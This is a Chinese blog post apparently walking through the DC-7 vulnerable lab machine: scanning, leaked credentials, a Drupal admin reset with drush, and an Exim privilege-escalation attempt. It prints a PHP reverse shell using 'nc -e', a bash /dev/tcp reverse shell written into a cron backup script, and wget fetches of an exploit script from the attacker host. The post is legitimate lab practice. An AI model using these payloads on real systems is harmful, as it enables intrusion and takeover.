IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> DC7靶机训练 -> 正文阅读

[系统运维]DC7靶机训练

kali:192.168.78.131
DC-7:192.168.78.142

扫描存活主机和开放端口

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.142

在这里插入图片描述

访问80端口

在这里插入图片描述

又是这个框架,这个系列遇到很多次了
其实再前面我们使用NMAP命令的时候已经对80端口做了域名扫描,这里就不再使用dirseach扫描

在这里插入图片描述
看到/user/login,访问一下:
在这里插入图片描述

不行没办法,整个框架被修改过业务,并没有存在像DC8一样的sql注入
回过头再来看看提示:



DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box.  :-)

译文:

DC-7引入了一些“新”概念,但我将留给您去弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。

你必须做的是跳出框框思考。

“在”盒子外面。:-)

很明显告诉我们了这个是被修改过的,很难受。

在这里插入图片描述

百度一下?@DC7USER

在这里插入图片描述
目测是框架源码?
在这里插入图片描述目测是需要我代码审计?当场愣住
最后在config.php中发现账户和密码

在这里插入图片描述

尝试半天登录不了

在这里插入图片描述
使用SSH登录试试

在这里插入图片描述

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
发现可疑的exim4

在这里插入图片描述

奇了怪了 ,这里居然不能查询,很是诧异
回到当前目录下,发现新的提示:

在这里插入图片描述

查看一下mail

在这里插入图片描述
发现database存储的位置,还是刚才的backups目录,
直接查看会乱码

在这里插入图片描述
有点尴尬 一时间不知道怎么办,再去看看那个mail

在这里插入图片描述

查看backups.sh权限

在这里插入图片描述
发现一个写入权限
补充知识点,ls-al 的命令列内容依次是:

在这里插入图片描述

没有权限啊这里

再看一下backups.sh的内容:

在这里插入图片描述
发现使用了drush

在这里插入图片描述

修改密码:

drush user-password admin --password="123456"

登录admin,登录成功之后可以像DC8一样添加PHP代码反弹shell,但是这里缺少PHP,所以需要自己先下载
在这里插入图片描述

添加url后下载成功,勾选PHP
在这里插入图片描述
即可添加成功,然后再页面里面编辑,直接反弹shell

在这里插入图片描述
写shell
在这里插入图片描述

发现写不进去,然后跟着其他作者WP知道了原因

I’d gone through this exercise a couple of times and it seemed that on the first instance of selecting preview, I did not get PHP to render. Perhaps we need to change the Text format in advance of entering PHP or maybe it’s just this particular install being buggy. Just pointing that out in case it doesn’t work the first time around.


我已经做了几次这个练习,似乎在选择preview的第一个实例中,我没有让PHP进行渲染。也许我们需要在进入PHP之前更改文本格式,或者可能只是这个特定的安装有问题。如果第一次不起作用,就指出这一点。


解决方案:不在basic page里面插入php代码,在其他页面插入就好了

这里我选择了一个404页面

<?php system("nc -e /bin/bash 192.168.78.131 2333") ;?>

在这里插入图片描述
成功反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
www-data权限,需要进行提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
发现exim的SUID权限,类似昨天打的DC-8系列,还是接着走一遍提权过程

exim --version 

在这里插入图片描述

searchsploit exim

在这里插入图片描述
发现合适的版本,将脚本复制到本地,然后转换成unix格式(linux脚本在windows下有时不可用)

第一个方法:在命令模式下:
	:set ff =unix
第二个方法:将格式直接转换成unix格式
	dos2unix 46996.sh #将文件转换成unix格式

接下来下载sh脚本即可,最简单的开放一个端口 wget下载

python -m SimpleHTTPServer 8000
wget http://192.168.78.131:8000/46996.sh

加权限,运行脚本

chmod +x 46996.sh
./46996.sh -m netcat

在这里插入图片描述

emmm,一顿操作猛如虎,结果不能提权,出错了,欸
去查看sh的权限

在这里插入图片描述

权限拉满

root表示文件拥有者
www-data表示文件所在组的权限#当前就是www用户,所以操作拉满
最后一个表示其他用户的权限

补充一个小知识:
 groups xxx(用户名称) 可以查看自己所在组成员用户

我这里VI编辑的话,会出现以下问题:
在这里插入图片描述
所以换个方法写入到脚本里面

echo "bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 "

写入并成功查看页面

在这里插入图片描述
EMM ,查看了下定时任务,发现并没有这个定时任务啊,惊了

ls -l /etc/cron*

在这里插入图片描述
提权失败,emm。希望懂的师傅指出

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-09-09 12:11:03  更:2021-09-09 12:13:05 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/30 3:22:26-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码